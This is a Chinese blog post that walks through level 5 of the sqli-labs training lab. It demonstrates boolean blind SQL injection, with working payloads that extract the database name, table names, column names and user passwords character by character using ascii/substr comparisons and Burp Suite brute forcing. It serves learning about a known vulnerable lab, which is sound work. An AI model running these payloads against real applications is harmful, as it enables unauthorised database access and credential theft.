sqllab第五关解析

最新推荐文章于 2024-04-20 11:30:00 发布
最新推荐文章于 2024-04-20 11:30:00 发布
阅读量990 收藏 1
点赞数 1
分类专栏: web渗透 文章标签: sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/103459864
版权
  1. 查看注入

    在这里插入图片描述

    “1”说明刚好闭合,我们查看字段试试

    在这里插入图片描述

    成功报错了,但是有一个额外情况,那就是当我们查看字段3的时候它是这么一个情况,注意这里用的是1而不再是-1了,因为它压根儿就没返回任何username和password,只有个句子。

    在这里插入图片描述


这说明我们遇到了无比令人厌烦的布尔注入


2.屏幕不提示内容,我们知道的只有一个信息,那就是,当我们构造的语句正确的时候,它必然返回you are in,所以我们在这里所有的语句的逻辑都应该归纳到本语句正不正确的问题上。
不是想方设法的知道1+1=几,而是要想方设法的时候知道2作为1+1答案的时候对不对。
接下来用语句猜测一下数据库名字的长度是多少:
语句1:1’ and (length(database()))=8–+
语句2:1’ and length(database())=8–+


我们从1猜测到8,发现等于8的时候成立了,返回了you are in

在这里插入图片描述

意思是这个数据库的名字长度是8,接下来我们要一个字母一个字母的判断,这就是布尔盲注之所以繁琐的原因。

  1. 用语句判断第一个字母

语句:1' and ascii(substr(database(),1,1))=1#


由于页面无法直接回显字母样貌,所以我们用ascii(字母)来判断这个字母的ascii数值是否等于多少,简而言之就是 判断ascii(a)=97正不正确,substr函数在这里不做过多讲述,可自行百度sql函数里substr()的用法

由于这种方法太复杂,直接用bp抓包实验,是115,然后查看115的ascii对照数值,是字母s,然后依次查找,最后得到数据库名称security

在这里插入图片描述

  1. 判断表的数量

    语句:1' and (select count(*) from information_schema.tables where table_schema=database())=1

    在这里插入图片描述

    猜测到了表的数量是4

  2. 判断第一个表的长度

    语句:1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=1#

    在这里插入图片描述


BP跑或者手动猜测,这里第一个表长度是6

  1. 判断第一个表第一个字母的ascii数值

    语句:1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1)=1--+

在这里插入图片描述

第一个字母ascii对应101,即e,然后依次对应着向后查找

为了方便这里标识出来:
1' and (select ascii(substr(table_name,x,1)) from information_schema.tables where table_schema=database() limit y,1)=1--+

在这里的x表示查询第几个字母的ascii

在这里的y表示查询的字母从第几个表开始

6,在查询到有一个表叫做users的情况下查看这个表下的列有几个

语句:1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3--+


在这里插入图片描述


这里一共找到了3个列

  1. 查询表中第一个列的长度


语句:1' and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=2--+

第一个列的长度是2,盲猜名字是id

在这里插入图片描述


查看第二个列长度

语句:1' and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)=8--+

在这里插入图片描述


长度是8,估计有戏

  1. 查看这个列的第一个字母的ascii

语句:1' and (select ascii(substr(column_name,1,1)) from information_schema.columns where table_schema=database() and table_name='表名' limit 1,1)=1#

在这里插入图片描述


报出来117,字母是u,盲猜username


具体情况是要具体分析的,这里的username应该一个字母一个字母查找出来

  1. 然后我们查询我们想要的列下的长度,这里以username为例


语句:?id=1' and (select length(username) from security.users limit 0,1)=4 --+

在这里插入图片描述


这里只有limit 0,1这个参数,0这个参数就是控制查找第列的内容的


9.根据上面这些情况,按理说仍然使用1’ and ascii(substr((select length(列名) from 表名 limit 0,1),1,1)=1 #这种转换ascii的方式应该也能获取列名和表名,但在实际应用中提示引号错误,因为暂时没有搞清楚原因,所以这里采用其他格式的语句进行注入

(错误,仅供演示)语句:?id=1’ and ord(mid((select ifnull(cast(password as char),0x20)from security.users order by id limit 0,1),1,1))=68 %23


其中的格式的是 id=1’ and ord(mid((select ifnull(cast(password as char), 0x20)from security.users order by id limit A,1),B,1))=68%23

具体文档请分析:https://blog.csdn.net/weixin_34365417/article/details/89828287

Ord函数:实例ord(‘a’)=97
Mid函数和substr函数类似,用于截取
Ifnull函数,ifnull(a,b),如果a的值为null则返回b
Cast函数,数据类型转换
A表示查询第几个用户
B表示查找该用户第几个字母


语句:?id=1'%20 and ascii(substr((select ifnull(password,0x20)from security.users limit 0,1),1,1))=68--+


按照习惯将ord换成substr,将mid换成substr,而且,字符串在mysql中储存的时候是varchar类型,这里的数据转换cast也省略了。

然后能逐个字母拼出第一个用户的Dumb密码

在这里插入图片描述


附录:经过后来的验证,如果把ifnull去掉也是可行的
语句:`?id=1' and ascii(substr((select password from security.users limit 0,1),1,1))=68--+`

但在查询第一个字母的时候0这个数值似乎会产生干扰

在这里插入图片描述

Deeeelete
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
SQLLab51:实验5
03-21
SQLGroupLab5
sqli-labs第五
qq_73722777的博客
03-02 591
于是我们尝试使用报错注入的方法对网页进行注入测试,这里我们使用dateupxml()语句进行报错注入。用以下语句进行名字-密码的分开输出,其中floor(rand(0)*2),count(*)为报错语句。此时的一个用户的用户名和密码获取完毕,继续获取第二个用户的数据。尝试对其进行联合搜索,但是输出结果不变,说明不能进行联合搜索。因此我们得知第五应该为数字类型,于是尝试对其查询行数。此时可以发现数据输出不完全,需要分组对数据进行输出。得到结果超出行数,于是重新尝试3行。此时没有报错,说明行显数为3。
Sql注入之sqllab第5使用函数练习
ailkli的博客
06-12 143
ascii判断大小写。
sqlilabs第五布尔盲注(burpsuite版)
最新发布
xnxqwzy的博客
04-20 778
一.判断有无注入点及注入类型:id=1​编辑id=1’(这里可以看到页面显示sql语句报错信息,基本可以判定为’闭合)​编辑补全后查看页面效果(1=1时有返回页面,1=2时无返回页面,无报错信息,符合页面布尔类型状态,尝试使用布尔型注入)1.页面没有回显不能用联合查询(order by、union select ),页面没有报错信息不能用报错注入。2.页面布尔类型状态:页面无回显且无报错信息。id=1’ – +​编辑​编辑​编辑猜测数据库长度:(若是猜错,没有返回页面)​编辑。
sqli-labs-----第五
wyzhxhn的博客
11-06 848
单引号字符型updatexml报错注入
sqli-lab5和10详解
cangyu51462的博客
04-16 2314
sqli-lab5和10详解
sql-labs 闯 5~10
qq_44663230的博客
08-14 1395
sql-labs 第5~10 盲注系列
SQL-lab:sql注入全部解析
04-17
SQL-labsql注入全部解析1. 先看题,要求输入一个数字入乡随俗,试一试很显然,会有回显接下来自由发挥,再输入一个2试试,又变了接下来,接下来试一试他的闭合方式添加完单引号,根据报错的回显,发现他是单引号闭合...
SQLLab5:从node.js连接到mysql
03-08
SQLLab5 从node.js连接到mysql
sqli-labs.zip
12-31
sql注入渗透测试环境,易于搭建,学习SQL注入必备环境。 里面一共有60多节课程。 非常不错的安全技术学习资料。
sql-linux-lab:在 Linux 上开始使用 MS SQL Server 的脚本和文档-开源
06-29
Sql-linux-lab 提供了一组带有相文档的 Transact-SQL 脚本,用于在嵌入持久内存 NVDIMM 的 Linux 服务器上开始使用 Microsoft SQL Server。
sql_lab_第5 Python源码SQL注入
04-25
SQLI-LAB是专门练习SQL注入的实验环境,最新有69道题涵盖了SQL注入的所有分类,相下载链接:https://github.com/Audi-1/sqli-labs
sqli-labs 第五
m0_63711447的博客
04-01 4479
第五可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
sqli-labs通(五)
qq_65950075的博客
04-30 803
但是这一没有回显信息,输入正确就会出现以下信息,错误则会报错,说明存在布尔盲注,我们可以利用这个来进行判断。函数 substr(a,b,c),a是截取的字符串 ,b是截取的位置 ,c是截取的长度。length()函数是返回字符串的长度,先暂且猜测数据库名长度是1。开始攻击,8的返回长度不一样,所以猜测数据库名的长度就是8。然后就是逐个爆破后面字母,直到把8个字母的库名爆出来,但是。然后我们验证,显示正常,说明数据库名长度就是8。设置类型为数值,从1到20,步长为1。id=1,只有下面这种结果。
sql-libs(5)
weixin_30352191的博客
08-13 200
直接只用floor报错注入 或者 update即可 转载于:https://www.cnblogs.com/kuaile1314/p/11345399.html
基于Sqli-Labs靶场的SQL注入-第五(重点讲双查询注入)
Joker
11-19 3938
双查询是指两个查询语句的嵌套,也就是一个select语句中在去套一个select语句,然后利用group by 语句和floor函数的结合去报错,再将我们需要的信息显示到报错信息中。
sql-labs 5-6通笔记
qq_45317844的博客
07-09 926
sql-labs 通
sqli-labs第五sql注入流程(重点讲updatexml函数的特性)
m0_74798594的博客
05-09 522
注:limit 1,1中前面的1可以换0,2,3... 帐号和密码中间的0是为了将二者分别开,没有特殊含义。通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。所以这应该是盲注。加上单引号后,发现会返回报错信息,且可以知道是单引号闭合的,可以考虑使用报错注入。使用报错的sql盲注有很多方法,本文使用updatexml函数的特性来进行报错注入。注:两个1都可以换成任意值不影响,这里主要是利用xpath的语法来爆相数据。测试id=1,没有显示数据。
sqli-lab(5~6详解)
gongjingege的博客
10-17 692
** Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入) ** 知识点:1,时间延迟型手工注入;布尔型手工注入;使用concat聚合函数 2,payload原理及防御措施 3,sqlmap真香,脚本也好使 ** 0x0a 时间延迟型手工注入 ** ps: 什么是时间盲注,时间盲注就是页面不会有回显,没有回显怎么办?这时候我们可以通过sleep(),让他沉睡 为什么通过sleep() 可以判断是否存在时间盲注,因为只要
sqllab连接数据库
09-27
5. 设置连接属性:使用`命令对象名称.Connection`属性将命令对象与连接对象联起来。 6. 设置命令文本:使用`命令对象名称.CommandText`属性设置SQL语句。 7. 执行命令:使用`命令对象名称.ExecuteNonQuery()`方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值